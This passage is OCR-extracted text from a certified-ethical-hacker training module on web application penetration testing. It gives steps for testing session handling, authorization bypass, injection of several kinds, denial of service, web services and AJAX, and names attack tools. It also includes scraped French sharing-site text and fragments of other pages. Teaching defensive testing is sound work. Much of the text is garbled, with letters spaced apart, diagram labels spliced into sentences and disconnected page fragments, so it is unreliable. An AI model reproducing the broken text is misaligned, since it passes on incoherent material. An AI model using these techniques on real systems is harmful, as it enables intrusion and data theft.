g u e s s i n g , s o c i a l e n g i n e e r i n g , o r c r a c k i n g s e c r e t q u e s t i o n s , if u s e d . C h e c k if a " r e m e m b e r m y
p a s s w o r d " m e c h a n i s m is i m p l e m e n t e d b y c h e c k i n g t h e H T M L c o d e o f t h e l o g i n p a g e ; t h r o u g h
this p a s s w o rd , a u th e n tic a tio n w e a k n e s s can b e u n c o v e re d .
S t e p 2: T e s t f o r l o g o u t a n d b r o w s e r c a c h e m a n a g e m e n t
Check if it is possible to "reuse" a session after logout. Also check if t h e application

a u t o m a t i c a l l y logs o u t a u s e r w h e n t h a t u s e r h a s b e e n idle f o r a c e r t a i n a m o u n t o f t i m e , a n d
t h a t n o s e n s i t i v e d a t a r e m a i n s s t o r e d in t h e b r o w s e r c a c h e .
S t e p 3: T e s t f o r C APTC HA
I d e n t i f y all p a r a m e t e r s t h a t a r e s e n t in a d d i t i o n t o t h e d e c o d e d C A P T C H A v a l u e f r o m t h e c l i e n t
t o t h e s e r v e r a n d t r y t o s e n d a n o l d d e c o d e d C A P T C H A v a l u e w i t h a n o l d C A P T C H A ID o f a n o l d
s e s s i o n ID. T h i s h e l p s y o u t o d e t e r m i n e a u t h e n t i c a t i o n v u l n e r a b i l i t i e s .

Session M a n a g e m e n t T e s tin g C E H
START Collect s u ffic ie n t n u m b e r o f c ookie

sam ples, analyze th e cookie g en era tion
a lg o rith m and fo rg e a v alid cookie in
Cookie ta m p e rin g results in
hijacking th e sessions o f o rd e r t o p e rfo rm th e a tta c k
le g itim a te users Test fo r cookie a ttrib u te s using
in te rc e p tin g proxies such as W ebscarab,
B u rp p ro x y , OWASP ZAP, o r tra ffic
Test f o r c o o k ie Cookie in fo rm a tio n to
in te rc e p tin g b ro w s e r plug-in's such as
hijack a v a lid session "T a m p e rlE "(fo r IE) and "T am per D a ta "(fo r
a ttr ib u te s
Firefox)
To te s t f o r session fix a tio n , m ake a

re q u e s t to th e s ite t o be te s te d and
A tta cker could steal the
Test f o r session
on analyze v u ln e ra b ilitie s using th e
■^ user session (session
fix a tio n W ebScarab to o l
■ hijacking)
Test fo r exposed session variab les by
in s p e c tin g e n c ry p tio n & reuse o f session
to k e n , proxies & caching , GET & POST,
Test f o r e x p o s e d C o n fid e n tia l in fo rm a tio n o f
session to k e n leads to a and tra n s p o rt v u ln e ra b ilitie s
session v a ria b le s
re p la y session attack Examine th e URLs in th e re s tric te d area
t o te s t forCSRF
V
Test fo rC S R F (C ross Com prom ises end user data
S ite R e q u e s t ■^ and o p e ra tio n o r e n tire
F o rg e ry ) w e b a p p lica tio n
pySj S e s s io n M a n a g e m e n t T e s tin g
A fter testin g th e configuration m a n a g e m e n t, te s t h o w t h e application m a n a g e s th e

session. T he follow ing a re t h e s te p s to c o n d u c t session m a n a g e m e n t p e n testing:
S t e p 1: T e s t f o r s e s s i o n m a n a g e m e n t s c h e m a
Collect a sufficient n u m b e r of co o k ie s a m p le s , an a ly z e t h e co o k ie g e n e r a t io n a lg o rith m , a n d

f o r g e a v a l i d c o o k i e in o r d e r t o p e r f o r m t h e a t t a c k . T h i s a l l o w s y o u t o t e s t y o u r a p p l i c a t i o n
a g a i n s t c o o k i e t a m p e r i n g , w h i c h r e s u l t s in h i j a c k i n g t h e s e s s i o n s o f l e g i t i m a t e u s e r s .
S t e p 2: T e s t f o r c o o k i e a t t r i b u t e s
T e st for co o k ie a tt r i b u te s using in te rc e p tin g proxies su ch as W e b s c a r a b , Burp Proxy, O W ASP

Z A P , o r t r a f f i c i n t e r c e p t i n g b r o w s e r p l u g i n s s u c h a s " T a m p e r l E " ( f o r IE) a n d " T a m p e r D a t a " ( f o r
F i r e f o x ) . If y o u a r e a b l e t o r e t r i e v e c o o k i e i n f o r m a t i o n , t h e n y o u c a n u s e t h i s i n f o r m a t i o n t o
hijack a valid s e s s io n .
S t e p 3: T e s t f o r s e s s i o n f i x a t i o n
To t e s t fo r se ssio n fixation, m a k e a r e q u e s t to t h e site to b e t e s t e d a n d a n a ly z e vuln erab ilities

u s i n g t h e W e b S c a r a b t o o l . T h i s h e l p s y o u t o d e t e r m i n e w h e t h e r y o u r a p p l i c a t i o n is v u l n e r a b l e
t o s e s s io n hijacking.

A u t h o r iz a t io n T e s t in g C EH
teftMM ItkMJl Nm Im
START
y Can ga in access to
re s e rv e d in fo r m a tio n
© Test fo r path traversal by p erform ing in p u t v e c to r e n u m e ra tio n and analyzing th e in p u t va lid a tio n fu n c tio n s present in
th e w eb application
e Test fo r bypassing a uth oriza tion schema by exam ining the adm in fu n c tio n a litie s , to gain access to th e resources
assigned to a d iffe re n t role
‫ט‬ Test fo r ro le /p riv ile g e m a n ip u la tio n
A u th o r iz a tio n T e s tin g
Follow the steps here to test the web application against authorization
vulnerabilities:
S t e p 1: T e s t f o r p a t h t r a v e r s a l
Test for path traversal by perform ing input vector enum eration and analyzing the input
validation fu n ctio n s present in t h e web application. P ath trav ersal allow s a tta c k e rs to gain
access to reserved inform ation.
S t e p 2: T e s t f o r b y p a s s i n g a u t h o r i z a t i o n s c h e m a
T est for bypassing a u th o riz a tio n s c h e m a by ex am in in g t h e a d m in functionalities, to gain access

to the resources assigned to a different role. If t h e attacker succeeds in bypassing the
a u t h o r i z a t i o n s c h e m a , h e o r s h e c a n g a i n illegal a c c e s s t o r e s e r v e d f u n c t i o n s / r e s o u r c e s .
S t e p 3: T e s t f o r p r i v i l e g e e s c a l a t i o n
T e s t f o r r o l e / p r i v i l e g e m a n i p u l a t i o n . If t h e a t t a c k e r h a s a c c e s s t o r e s o u r c e s / f u n c t i o n a l i t y , t h e n
h e or s h e can p e rfo rm a privilege e sc a la tio n a tta c k .

D a t a V a lid a t io n T e s t in g C E H
U rtifM itfciui Nm Im
START
Detect and analyze input vectors for potential vulnerabilities, analyze the
Session cookie vulnerability report and attempt to exploit it. Use tools such asOWASP CAL9000,
WebScarab, XSS-Proxy, ratproxy, and Burp Proxy
in fo rm a tio n
Analyze HTMLcode, test for Stored XSS, leverageStoredXSS,verifyifthefile
upload allows setting arbitrary MIMEtypes using tools such asOWASP CAL9000,
Hackvertor, BeEF, XSS-Proxy, Backframe, WebScarab, Burp,and XSS Assistant
9 Perform source code analysis to identify JavaScript coding errors
Sensitive in fo rm a tio n
Test fo r s to re d 9 Analyze SWF files using tools such as SWFIntruder, Decompiler ‫ ־‬Flare, Compiler
such as session
c ro s s -s ite s c rip tin g ‫ ־‬MTASC, Disassembler -Flasm,Swfmil I, and Debugger Version of Flash
a uth oriza tion tokens Plugi n/Player
9 Perform Standard SQL Injection Testing, Union Query SQL Injection Testing,
Blind SQL Injection Testing, and Stored Procedure Injection using tools suchas
OWASP SQLiX, sqlninja, SqlDumper, sqlbftools, SQLPower Injector, etc.
Test fo r D O M -b a s e d « Use a trial and error approach by inserting'(',' I', and the other
Cookie in fo rm a tio n
c ro s s -s ite s c rip tin g characters in order to check the appl icati on for errors. Use the tool Softerra
LDAP Browser
In fo rm a tio n on DOM-
Test fo r cross s ite Sensitive in fo rm a tio n
based cross-site < .......
fla s h in g a bo u t users and hosts
scripting vulnerabilities
P e rfo rm SQL __ ^ P e rfo rm LDAP

Database in fo rm a tio n < .......
in je c tio n te s tin g in je c tio n te s tin g
D a ta V a lid a tio n T e s tin g
W e b applications m u st e m p lo y p ro p e r d a ta validation m e th o d s. O th erw ise, th e r e m ay

be a ch an ce for th e atta c k e r to b re a k into t h e c o m m u n ic a t io n b etw een the client a n d th e
server, a n d inject m alicious d a ta . H en ce, t h e d a ta validation p e n te s tin g m u s t b e c o n d u c t e d to
ensure that the current data validation m ethods or techniques em ployed by the web
a p p licatio n o ffer a p p r o p r i a t e security. Follow t h e s te p s h e r e to p e r f o r m d a t a v a lid a tio n te s tin g :
S t e p 1: T e s t f o r r e f l e c t e d c r o s s - s i t e s c r i p t i n g
A r e f l e c t e d c r o s s - s i t e s c r i p t i n g a t t a c k e r c r a f t s a URL t o e x p l o i t t h e r e f l e c t e d XSS v u l n e r a b i l i t y
a n d s e n d s it t o t h e c l i e n t in a s p a m m a i l . If t h e v i c t i m c l i c k s o n t h e l i n k c o n s i d e r i n g it a s f r o m a
t r u s t e d s e r v e r , t h e m a l i c i o u s s c r i p t e m b e d d e d b y t h e a t t a c k e r in t h e URL g e t s e x e c u t e d o n t h e
victim 's b r o w s e r a n d sends the victim 's s e s s io n cookie to the attacker. Using this sessio n
co o k ie , t h e a t t a c k e r c a n ste a l t h e s e n s itiv e in f o r m a tio n o f t h e victim . H e n c e , t o av o id th is kind
o f a t t a c k y o u m u s t c h e c k y o u r w e b a p p l i c a t i o n s a g a i n s t r e f l e c t e d XSS a t t a c k s . If y o u p u t p r o p e r
d a t a v a l i d a t i o n m e c h a n i s m s o r m e t h o d s in p l a c e , t h e n y o u c a n d e t e r m i n e e a s i l y w h e t h e r t h e
URL c a m e o r i g i n a l l y f r o m t h e s e r v e r o r it is c r a f t e d b y t h e a t t a c k e r . D e t e c t a n d a n a l y z e i n p u t
v e c t o r s f o r p o t e n t i a l v u l n e r a b i l i t i e s , a n a l y z e t h e v u l n e r a b i l i t y r e p o r t , a n d a t t e m p t t o e x p l o i t it.
U s e t o o l s s u c h a s O W A S P C A L 9 0 0 0 , H a c k v e r t o r , B e E F , X S S - P r o x y , B a c k f r a m e , W e b S c a r a b , XSS
A ssistant, a n d B urp Proxy.

D a ta V a lid a tio n T e s tin g CEH

( C o n t ’d )
© D is c o v e r v u ln e r a b ilitie s o f an O R M
t o o l a nd te s t w e b a p p lic a tio n s t h a t use
O R M . U se to o ls such as H ib e rn a te ,
I n fo r m a tio n o n SQL
N h ib e rn a te , and R uby O n Rails
in je c tio n v u ln e ra b ility
© Try t o in s e rt X M L m e ta c h a ra c te rs
© Find if th e w e b s e rv e r a c tu a lly
I n fo r m a tio n a b o u t
s u p p o rts SSI d ire c tiv e s using to o ls
X M L s tru c tu re
such as W e b P roxy B u rp S uite, OWASP
ZAP, W ebS cara b, S trin g s e a rc h e r: grep
W e b s e rv e r CGI © In je c t X P a th c o d e a n d in te r fe re w ith
e n v iro n m e n t v a ria b le s th e q u e ry re s u lt
© I d e n t if y v u ln e r a b le p a ra m e te rs .
U n d e rs ta n d th e d a ta f lo w a nd
Access c o n fid e n tia l d e p lo y m e n t s tru c tu re o f th e c lie n t,
in fo r m a tio n a n d p e r fo rm IM A P /S M T P c o m m a n d
in je c tio n
P e rfo rm IM A P /S M T P A ccess t o th e backend

in je c tio n te s tin g m a il s e rv e r
D a ta V a lid a tio n T e s tin g ( C o n t ’d )
S t e p 7: P e r f o r m O R M i n j e c t i o n t e s t i n g
Perform ORM injection testing to discover vulnerabilities of an ORM tool and test web
a p p l i c a t i o n s t h a t u s e O R M . U s e t o o l s s u c h a s H i b e r n a t e , N h i b e r n a t e , a n d R u b y O n Rails. T h i s
t e s t g iv e s i n f o r m a t i o n o n SQL i n j e c t i o n v u l n e r a b i l i t i e s .
S t e p 8: P e r f o r m X M L i n j e c t i o n t e s t i n g
T o p e r f o r m XML i n j e c t i o n t e s t i n g , t r y t o i n s e r t XML m e t a c h a r a c t e r s a n d o b s e r v e t h e r e s p o n s e .
A s u c c e s s f u l XML i n j e c t i o n m a y giv e i n f o r m a t i o n a b o u t X M L s t r u c t u r e .
S t e p 9 : P e r f o r m SSI i n j e c t i o n t e s t i n g
P e r f o r m SSI i n j e c t i o n t e s t i n g a n d f i n d if t h e w e b s e r v e r a c t u a l l y s u p p o r t s SSI d i r e c t i v e s u s i n g
t o o l s s u c h a s W e b P r o x y B u r p S u i t e , P a r o s , W e b S c a r a b , S t r i n g s e a r c h e r : g r e p . If t h e a t t a c k e r c a n
i n j e c t SSI i m p l e m e n t a t i o n s , then he or she can set or print w e b s e r v e r CGI e n v i r o n m e n t
variables.
S te p 10: P e r f o r m X P a th in je c tio n t e s t i n g
Inject X Path c o d e a n d in te rfe re w ith t h e q u e r y result. X Path injection allow s t h e a tt a c k e r to

access confidential inform ation.

D a ta V a lid a tio n T e s tin g

CEH
( C o n t ’d )
In je c t code (a m alicious URL) and p e rfo rm

In p u t v a lid a tio n source code analysis t o discover code
■‫<״‬
e rro rs in je c tio n vu ln e ra b ilitie s
P e rfo rm m anual code analysis and c ra ft

m alicious HTTP requests using | t o te s t fo r
OS com m a n d in je c tio n attacks
P e rfo rm OS ...y L oca l d a ta and
c o m m a n d in g sys te m in fo r m a tio n P e rfo rm m anual and a u to m a te d code
analysis using to o ls such as O llyD bg to
y d etect b u ffe r o v e rflo w c o n d itio n
S tack and he a p m e m o ry U pload a file th a t e x p lo its a c o m p o n e n t in

P e rfo rm b u ffe r
^ in fo r m a tio n , a p p lic a tio n th e local user w o rk s ta tio n , w h en vie w ed or
o v e r flo w te s tin g
c o n tr o l f lo w dow n lo a d e d by th e user, p e rfo rm XSS, and
SQL in je c tio n a ttack
y
Id e n tify all user c o n tro lle d in p u t th a t
S e rver c o n fig u ra tio n
P e rfo rm in c u b a te d influences one o r m o re headers in th e
' and in p u t v a lid a tio n
v u ln e r a b ility te s tin g response, and check w h e th e r he o r she can
schem es
successfully inject a CR+LF sequence in it
Test fo r HTTP ...-y C o o k ie s , a n d HTTP

s p littin g /s m u g g lin g re d ire c t in fo r m a tio n
D a ta V a lid a tio n T e s tin g ( C o n t ’d )
‫י‬ S te p 12: P e r f o r m c o d e injectio n te s tin g
To p e rfo rm code injection testing, inject c o d e (a m a l i c i o u s URL) a n d perform source code

a n a l y s i s t o d i s c o v e r c o d e i n j e c t i o n v u l n e r a b i l i t i e s . It g i v e s i n f o r m a t i o n a b o u t i n p u t v a l i d a t i o n
errors.
S te p 13: P e r f o r m OS c o m m a n d i n g
Perform manual code analysis and craft malicious HTTP requests using | to test for OS
c o m m a n d in j e c t i o n a t t a c k s . OS c o m m a n d i n g m a y r e v e a l local d a t a a n d s y s t e m i n f o r m a t i o n .
S te p 14: P e r f o r m b u f f e r o v e r f l o w te s t i n g
Perform m anual and autom ated c o d e analysis u sin g to o ls s u c h as OllyDbg to d e t e c t b u ffe r

o v e r f l o w c o n d it io n . This m a y h e lp y o u t o d e t e r m i n e s ta c k a n d h e a p m e m o r y i n f o r m a t i o n a n d
app lication co n tro l flow.
S te p 15: P e r f o r m i n c u b a t e d v u ln e r a b ility t e s t i n g
U pload a file t h a t exploits a com ponent in t h e local user w orkstation, when view ed or
d o w n l o a d e d b y t h e u s e r , p e r f o r m XSS, a n d S Q L i n j e c t i o n a t t a c k s . I n c u b a t e d v u l n e r a b i l i t i e s m a y
give in f o r m a tio n a b o u t s e r v e r c o n fig u ra tio n a n d in p u t v a lid a tio n s c h e m e s to t h e a tta c k e rs .

D e n ia l‫־‬o f‫־‬S e r v ic e T e s t in g CEH
d C raft a q u e ry th a t w ill n o t re tu rn a re s u lt and

A p p lic a tio n
includes several w ildca rds. Test m anu a lly or
in fo r m a tio n
e m p lo y a fuzzer to a u to m a te th e process
6 Test th a t an accou nt does indeed lock a fte r a

Test fo r lo c k in g Login a c c o u n t certa in n u m b e r o f failed logins. Find places
c u s to m e r a cco u n ts in fo r m a tio n w h e re th e app lic a tio n discloses th e difference
betw e en v alid and in v a lid logins
P e rform a m anual source code analysis and

Test fo r b u ffe r B u ffe r o v e r flo w
s u b m it a range o f in p u ts w ith v a rying lengths
o v e rflo w s p o in ts t o th e app lic a tio n
Find w h e re th e num bers s u b m itte d as a

M a x im u m n u m b e r o f n a m e /v a lu e pair m ig h t be used by th e
Test fo r u se r s p e c ifie d
■> o b je c ts th a t a p p lic a tio n a p p lic a tio n code and a tte m p t to set th e value
o b je c t a llo c a tio n to an e xtre m e ly large n u m e ric v a lu e , th e n see
c a n h a n d le
if th e server c o n tin u e s t o respond

I
D e n i a l ‫־‬o f ‫־‬S e r v ic e T e s tin g
To c h e c k y o u r w e b a p p lic a tio n a g a in s t DoS a tta c k s , fo llo w t h e s e s t e p s :
S t e p l : T e s t f o r SQL w i l d c a r d a t t a c k s
C r a f t a q u e r y t h a t wi l l n o t r e t u r n a r e s u l t a n d includes several w ildcards. T est m anually or

em p lo y a fuzzer to a u to m a te th e process.
S tep 2 : T est for locking c u s t o m e r a c c o u n ts
T e s t t h a t a n a c c o u n t d o e s i n d e e d lock a f t e r a c e r t a i n n u m b e r o f fa ile d logins. Find p l a c e s w h e r e

t h e a p p l i c a t i o n d i s c l o s e s t h e d i f f e r e n c e b e t w e e n v a l i d a n d i n v a l i d l o g i n s . If y o u r w e b a p p l i c a t i o n
d o esn 't lock custom er accounts after a certain number of failed logins, then there is a
possibility fo r t h e a tta c k e r to crack c u s t o m e r p a s s w o r d s by em ploying b ru te force attacks,
d ic tio n a ry a tta c k s, etc.
Step3: Test for buffer overflow s
P erfo rm a m a n u a l s o u rc e c o d e analysis a n d s u b m it a ra n g e of inputs w ith v ary in g le n g th s to th e

application to te s t for buffer overflow s.
S tep4: T est for u se r specified o b ject allocation
Find w h e r e t h e n u m b e r s s u b m i t t e d a s a n a m e / v a l u e p a ir m i g h t b e u s e d b y t h e a p p l i c a t i o n c o d e
a n d a t t e m p t t o s e t t h e v a l u e t o a n e x t r e m e l y l a r g e n u m e r i c v a l u e , a n d t h e n s e e if t h e s e r v e r

D e n ia l‫־‬o f‫־‬S e r v ic e T e s t in g
CEH
( C o n t ’d )
© Enter an extrem ely large n u m b e r in

Logical e rro rs in an th e in p u t fie ld th a t is used by
application as a loo p co un ter
a p p lic a tio n
© Use a script to a uto m atica lly subm it

an extrem ely long value to the server
in the request th a t is being logged
W rite user p rovid e d ,‫ •״‬w. Local
© Id e n tify and send a large num ber o f
data to disk d isks e x ha u stio n
requests th a t p e rfo rm database
o p e ra tio n s and observe any
slow d o w n o r new e rro r messages
© Create a script to a u to m a te the

Test fo r p ro p e r creation o f many n ew sessions w ith
‫►־‬ P ro g ra m m in g fla w s
release o f resources the server and run the request th a t is
suspected o f caching th e data w ithin
the session fo r each one
V
Test fo r sto ring to o Session m a na g e m en t

m uch data in session e rro rs
D e n i a l ‫־‬o f ‫־‬S e r v ic e T e s tin g ( C o n t ’d )
Step5: Test for u ser in p u t as a loop c o u n te r
T e s t f o r u s e r i n p u t a s a l o o p c o u n t e r a n d e n t e r a n e x t r e m e l y l a r g e n u m b e r in t h e i n p u t f i e l d t h a t
is u s e d b y a p p l i c a t i o n a s a l o o p c o u n t e r . If t h e a p p l i c a t i o n f a i l s t o e x h i b i t i t s p r e d e f i n e d m a n n e r ,
it m e a n s t h a t a p p l i c a t i o n c o n t a i n s a l o g i c a l e r r o r .
S tep 6 : W rite u s e r p ro v id e d d a ta to disk
U s e a s c r i p t t o a u t o m a t i c a l l y s u b m i t a n e x t r e m e l y l o n g v a l u e t o t h e s e r v e r in t h e r e q u e s t t h a t is
b ein g logged.
Step7: Test for p ro p e r release of reso u rces
Identify a n d s e n d a large n u m b e r o f r e q u e s t s t h a t p e r f o r m d a t a b a s e o p e r a t i o n s a n d o b s e r v e
any slow dow n or new error m essages.
S t e p 8 : T e s t f o r s t o r i n g t o o m u c h d a t a in s e s s i o n
C re a te a script to a u t o m a t e th e c re a tio n of m a n y n e w sessio n s w ith th e se rv e r a n d run t h e

r e q u e s t t h a t is s u s p e c t e d o f c a c h i n g t h e d a t a w i t h i n t h e s e s s i o n f o r e a c h o n e .

Web Services Testing CEH
w To gather WS information use tools such as wsCh ess, Soaplite, CURL, Peri, etc.
and online tools such as UDDI Browser, WSIndex, and Xmethods
» Use tools such as WSDigger, WebScarab, and Found stone to automate web
services security testing
« Pass malformed SOAP messages to XML parser or attach a very large string to
the message. Use WSdigger to perform autom ated XML structure testing
e Use web application vulnerability scanners such as WebScarab to test XML

content-level vulnerabilities
« Pass malicious c o nte nt on the HTTP GET strings th a t invoke XML applications
» Craft an XML docum ent (SOAP message) to send to a web service tha t contains
malware as an attachm ent to check if XML document has SOAP attachm ent
vulnerability
» A ttem pt to resend a sniffed XML message using Wireshark and WebScarab
In fo r m a t io n a b o u t SQL,
X P a th , b u f f e r o v e r flo w , I n f o r m a t io n a b o u t
a n d c o m m a n d in je c tio n M I T M v u ln e r a b ilit y
v u ln e r a b ilitie s
H T T P G E T /R E S T SOAP m e ssa ge
a t t a c k v e c to r s in f o r m a t io n
W e b S e r v i c e s T e s t i n g
Stepl: Gather WS information

Gather WS information using tools such as Net Square wsChess, Soaplite, CURL, Perl, etc. and
online tools such as UDDI Browser, WSIndex, and Xmethods.
Step 2: Test WSDL
Test WSDL to determine various entry points of WSDL. You can automate web services security
testing using tools such as WSDigger, WebScarab, and Foundstone.
Step 3: Test XML structural
Pass malformed SOAP messages to the XML parser or attach a very large string to the message.
Use WSdigger to perform automated XML structure testing.
Step 4: Test XML content-level
Use web application vulnerability scanners such as WebScarab to test XML content-level
vulnerabilities.
Step 5: Test HTTP GET parameters/REST
Pass malicious content on the HTTP GET strings that invoke XML applications.

AJAX Testing CEH
A JAX a p p lic a t io n c a ll
e n d p o in t s
X M L H t tp R e q u e s t o b je c t ,
P a rs e t h e H T M L a n d
J a v a S c rip t f ile s , A JAX
J a v a S c r ip t f i l e s
fra m e w o r k s
U se a p ro x y to ................. v F o r m a t o f a p p lic a t io n
o b s e rv e t r a ff ic re q u e s ts
8 E n u m e r a t e t h e A J A X c a ll e n d p o in t s f o r t h e a s y n c h r o n o u s c a lls u s in g t o o l s s u c h a s S p r a ja x
‫ט‬ O b s e r v e H T M L a n d J a v a S c r ip t f i l e s t o f i n d U R L s o f a d d it io n a l a p p lic a t io n s u r f a c e e x p o s u r e
© U s e p r o x i e s a n d s n i f f e r s t o o b s e r v e t r a f f i c g e n e r a t e d b y u s e r - v ie w a b le p a g e s a n d t h e b a c k g r o u n d a s y n c h r o n o u s
t r a f f i c t o t h e A J A X e n d p o in t s in o r d e r t o d e t e r m in e t h e f o r m a t a n d d e s t in a t io n o f t h e r e q u e s t s
A J A X T e s t i n g
The following are the steps used to carry out AJAX pen testing:
Step 1: Test for AJAX
Enumerate the AJAX call endpoints for the asynchronous calls using tools such as Sprajax.
Step 2: Parse the HTML and JavaScript files
Observe HTML and JavaScript files to find URLs of additional application surface exposure.
Step 3: Use a proxy to observe traffic
Use proxies and sniffers to observe traffic generated by user-viewable pages and the
background asynchronous traffic to the AJAX endpoints in order to determine the format and
destination of the requests.

M odule Summary U
CEH
rtiffetf itkNjI lUilwt
O rg a n iz a tio n s to d a y r e ly h e a v ily o n w e b a p p lic a t io n s a n d W e b 2 .0 te c h n o lo g ie s

t o s u p p o r t k e y b u s in e s s p ro c e s s e s a n d im p r o v e p e r fo r m a n c e
W i t h in c re a s in g d e p e n d e n c e , w e b a p p lic a t io n s a n d w e b s e rv ic e s a re in c r e a s in g ly b e in g ta r g e te d
b y v a r io u s a tta c k s t h a t re s u lts in h u g e re v e n u e lo s s f o r t h e o r g a n iz a tio n s
S o m e o f th e m a jo r w e b a p p lic a t io n v u ln e r a b ilit ie s in c lu d e in je c tio n fla w s , c ro s s - s ite s c r ip t in g

(XSS), SQL in je c tio n , s e c u r ity m is c o n fig u r a t io n , b r o k e n s e s s io n m a n a g e m e n t, e tc .
I n p u t v a lid a tio n fla w s a re a m a jo r c o n c e r n as a tta c k e r s ca n e x p lo it th e s e fla w s t o p e r fo r m o r

c r e a te a b a se f o r m o s t o f t h e w e b a p p lic a t io n a tta c k s , in c lu d in g c ro s s - s ite s c r ip tin g , b u ffe r
o v e r flo w , in je c tio n a tta c k s , e tc .
It is a ls o o b s e rv e d t h a t m o s t o f t h e v u ln e r a b ilit ie s r e s u lt b e c a u s e o f m is c o n fig u r a t io n a n d n o t
f o llo w in g s ta n d a rd s e c u r ity p ra c tic e s
C o m m o n c o u n te r m e a s u r e s f o r w e b a p p lic a t io n s e c u r ity in c lu d e s e c u re a p p lic a t io n

d e v e lo p m e n t, in p u t v a lid a tio n , c r e a tin g a n d f o llo w in g s e c u r ity b e s t p r a c tic e s , u s in g W A F
F ir e w a ll/ID S a n d p e r f o r m in g re g u la r a u d itin g o f n e t w o r k u s in g w e b a p p lic a t io n s e c u r ity to o ls
-----------
M o d u l e S u m m a r y
© Organizations today rely heavily on web applications and Web 2.0

technologies
to support key business processes and improve performance.
© With increasing dependence, web applications and web services are increasingly being
targeted by various attacks that results in huge revenue loss for the organizations.
e Some of the major web application vulnerabilities include injection flaws, cross-site
scripting (XSS), SQL injection, security misconfiguration, broken session management,
etc.
© Input validation flaws are a major concern as attackers can exploit these flaws to
perform or create a base for most of the web application attacks, including cross-site
scripting, buffer overflow, injection attacks, etc.
e It is also observed that most of the vulnerabilities result because of misconfiguration
and not following standard security practices.
© Common countermeasures for web application security include secure application
development, input validation, creating and following security best practices, using WAF
firewall/IDS, and performing regular auditing of network using web application security
tools.

CEHv8 Module 13 Hacking Web Applications Edit BCH Ok

Transféré par

Informations du document

Titre original

Copyright

Formats disponibles

Partager ce document

Partager ou intégrer le document

Options de partage

Avez-vous trouvé ce document utile ?

Ce contenu est-il inapproprié ?

Droits d'auteur :

Formats disponibles

CEHv8 Module 13 Hacking Web Applications Edit BCH Ok

Transféré par

Droits d'auteur :

Formats disponibles

Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker

Hacking Web Applications

Module 13 Page 1724 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

S o u rce : h ttp ://w w w .d a r k re a d in g .c o m

S e c u re c lo u d h o s tin g c o m p a n y , F ire H o s t, has t o d a y a n n o u n c e d t h e fin d in g s o f

its la te s t w e b a p p lic a tio n a tta c k re p o rt, w h ic h p ro v id e s s ta tis tic a l a n a ly s is o f th e 15 m illio n

c y b e r-a tta c k s b lo c k e d b y its s e r v e r s in t h e US a n d E u r o p e d u r in g Q 3 2 0 1 2 . T h e r e p o r t lo o k s a t

a tta c k s o n t h e w e b a p p lic a t io n s , d a ta b a s e s a n d w e b s it e s o f F ire H o s t's c u s t o m e r s b e t w e e n J u ly

A m o n g s t th e c y b e r-a tta c k s re g is te re d in t h e re p o rt, F ire H o s t c a te g o r is e s f o u r a tta c k ty p e s in

p a r tic u la r as r e p r e s e n tin g th e m o s t s e rio u s th r e a t. T h e s e a tta c k ty p e s a re am ong F ire H o s t's

Module 13 Page 1725 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

J How Web Applications Work J Session M anagem ent Attack

Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.

Module 13 Page 1728 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

Copyright © by E & C o in a l. All Rights Reserved. Reproduction is Strictly Prohibited.

W eb a p p lic a tio n s a re th e a p p lic a tio n pro g ra m s accessed o n ly w ith In te rn e t

Module 13 Page 1730 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

Web A p p lica tio n Security

Copyright © by E t C t in d l . All Rights Reserved. Reproduction is Strictly Prohibited.

Module 13 Page 1732 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

In tr o d u c tio n to W e b A p p lic a tio n s C E H

C o p y r ig h t © b y E&C01nal. A ll R ig h ts R e s e rv e d . R e p ro d u c tio n is S t r ic t ly P ro h ib ite d .

In tr o d u c tio n to W e b A p p lic a tio n s

W e b a p p lic a tio n s are th e a p p lic a tio n th a t run on th e re m o te w e b se rve r and send th e

A w e b a p p lic a tio n is c o m p ris e d o f m a n y layers o f fu n c tio n a lity . H o w e ve r, it is co n sid e re d a

The w e b a rc h ite c tu re relies s u b s ta n tia lly on th e te c h n o lo g y p o p u la rize d by th e W o rld W id e

W e b a p p lic a tio n s p ro v id e an in te rfa c e b e tw e e n end users and w e b servers th ro u g h a set o f

Som e o f th e p o p u la r w eb servers p re s e n t to d a y are M ic ro s o ft IIS, A pache S o ftw a re

Module 13 Page 1734 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

C o p y r ig h t © b y E& C oinal. A ll R ig h ts R e s e rv e d . R e p ro d u c tio n is S t r ic t ly P ro h ib ite d .

The c o m p o n e n ts o f w e b a p p lic a tio n s are liste d as fo llo w s

The Web Server: It re fers to e ith e r s o ftw a re o r h a rd w a re in te n d e d to d e liv e r w e b c o n te n t th a t

User Permissions: W h e n yo u are n o t a llo w e d to access th e sp e cifie d w e b page in w h ic h you are

The Application Content: It is an in te ra c tiv e p ro g ra m th a t accepts w e b re q u e sts by c lie n ts and

Module 13 Page 1736 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

C o p y r ig h t © b y E&C01nal. A ll R ig h ts R e s e rv e d . R e p ro d u c tio n is S t r ic t ly P ro h ib ite d .

W h e n e v e r s o m e o n e clicks o r typ e s in th e b ro w s e r, im m e d ia te ly th e re q u e ste d w e b s ite

The w e b a p p lic a tio n m o d e l is e xp la in e d in th re e layers. The firs t la ye r deals w ith th e user in p u t

Let's see h o w th e user trig g e rs th e in itia l re q u e s t th ro u g h th e b ro w s e r to th e w e b a p p lic a tio n

© First th e user ty p e s th e w e b s ite nam e o r URL in th e b ro w s e r and th e re q u e s t is sent to

© On re ce ivin g th e re q u e s t ,th e w e b s e rv e r checks th e file e xte n sio n :

© If th e user re q u e sts a s im p le w e b page w ith an HTM o r HTM L e x te n sio n , th e w e b

Module 13 Page 1738 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

J2EE .NET COM

Copyright © by E& C oinal. All Rights Reserved. Reproduction is Strictly Prohibited.

W e b A p p lic a tio n A r c h ite c tu r e

All w e b a p p lic a tio n s e x e cu te w ith th e help o f th e w e b b ro w s e r as a s u p p o rt c lie n t. The

In th e fo llo w in g a rc h ite c tu re , th e c lie n ts uses d iffe re n t devices, w e b b ro w se rs, and e x te rn a l

Module 13 Page 1740 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

Blogs (W o rdp ress)

New technologies like AJAX (Gmail, YouTube) Q

M o b ile a p p lic a tio n (iP hone) O O RSS-generated syndication

